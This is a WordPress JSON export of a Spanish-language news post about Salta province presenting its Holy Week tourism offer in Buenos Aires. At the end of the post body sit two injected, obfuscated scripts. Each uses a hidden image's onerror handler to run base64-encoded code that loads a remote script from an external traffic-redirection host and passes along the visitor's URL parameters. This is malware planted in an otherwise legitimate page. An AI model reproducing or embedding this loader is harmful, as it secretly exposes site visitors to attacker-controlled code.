{"id":2383,"date":"2023-03-23T13:05:00","date_gmt":"2023-03-23T16:05:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2383"},"modified":"2025-08-14T00:20:44","modified_gmt":"2025-08-14T03:20:44","slug":"salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2383","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-88667\">Salta present\u00f3 en Buenos Aires su oferta tur\u00edstica para Semana Santa<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#7b0e29\"><em>Ante medios period\u00edsticos especializados, el destino Salta mostr\u00f3 experiencias tradicionales e innovadoras para disfrutar entre el 6 y el 9 de abril.<\/em><\/h3>\n\n\n\n<p>Salta es diversidad, es paisajes y en Semana Santa ofrece una experiencia tur\u00edstica que fusiona religiosidad y cultura en un sincretismo que lo convierte en un destino \u00fanico en estas fechas.&nbsp;<\/p>\n\n\n\n<p>\u201cSemana Salta tiene la particularidad de un gran sincretismo donde se combinan expresiones populares con lo religioso, adem\u00e1s este destino tiene una gran diversidad en las siete regiones tur\u00edsticas. En estas fechas tenemos m\u00e1s de 200 actividades para ofrecer\u201d, se\u00f1al\u00f3 la secretaria de Turismo&nbsp;<strong>Nadia Loza<\/strong>&nbsp;en el marco de una presentaci\u00f3n realizada hoy en ciudad de Buenos Aires.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta present\u00f3 en Buenos Aires su oferta tur\u00edstica para Semana Santa\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/VLt5hk-1E-4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Adem\u00e1s de estas actividades organizadas por los municipios vinculadas a Semana Santa, la provincia ofrece opciones para recorrer su naturaleza \u00fanica, vivir una gastronom\u00eda \u00fanica y fusionarse con la cultura que atrae al turismo nacional e internacional.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron en la presentaci\u00f3n, la subsecretaria de Promoci\u00f3n<strong>&nbsp;Laura Alcorta<\/strong>, la directora nacional de Fiestas Nacionales&nbsp;<strong>Fernanda Rodr\u00edguez<\/strong>, la coordinadora de Casa de Salta&nbsp;<strong>Florencia Kosiner&nbsp;<\/strong>y el director de Turismo en Casa de Salta,&nbsp;<strong>Sebasti\u00e1n Sim\u00f3n<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6330-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6330-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg\" alt=\"Salta present\u00f3 en Buenos Aires su oferta tur\u00edstica para Semana Santa.\" width=\"-444\" height=\"-296\"\/><\/a><\/figure><\/div>\n\n\n<p>Nadia Loza adem\u00e1s record\u00f3 que la nueva edici\u00f3n de Previaje ser\u00e1 importante para los pr\u00f3ximos meses a la que calific\u00f3 \u201ccomo la mejor herramienta de la historia porque incentiva el turismo beneficiando al estado, al turista y al sector privado\u201d.<\/p>\n\n\n\n<p>Por otra parte, se refiri\u00f3 a las obras de infraestructura que se realizan en el destino que no tienen otros objetivos que mejorar los servicios tur\u00edsticos, la experiencia en destino incrementando el pernocte y a trav\u00e9s de la actividad, mejorar la calidad de vida de los salte\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2387\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2888-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg\" alt=\"\" class=\"wp-image-2387\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2888-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2888-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2888-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2888-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2888-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2384\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2889-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg\" alt=\"\" class=\"wp-image-2384\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2889-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2889-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2889-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2889-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2889-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2385\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2890-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg\" alt=\"\" class=\"wp-image-2385\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2890-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2890-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2890-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2890-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2890-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2386\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2891-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg\" alt=\"\" class=\"wp-image-2386\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2891-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2891-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2891-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2891-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2891-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"600\" data-id=\"2388\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2892-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg\" alt=\"\" class=\"wp-image-2388\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2892-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa.jpg 901w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2892-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2892-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-768x511.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2892-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-696x463.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2892-salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-631x420.jpg 631w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-presento-en-buenos-aires-su-oferta-turistica-para-semana-santa-88667\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ante medios period\u00edsticos especializados, el destino Salta mostr\u00f3 experiencias tradicionales e innovadoras para disfrutar entre el 6 y el 9 de abril. Salta es diversidad, es paisajes y en Semana Santa ofrece una experiencia tur\u00edstica que fusiona religiosidad y cultura en un sincretismo que lo convierte en un destino \u00fanico en estas fechas.&nbsp; \u201cSemana Salta [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2389,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,2,18],"tags":[],"class_list":{"0":"post-2383","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-religiosos","9":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2383"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2383"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2383\/revisions"}],"predecessor-version":[{"id":7139,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2383\/revisions\/7139"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2389"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2383"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2383"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2383"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}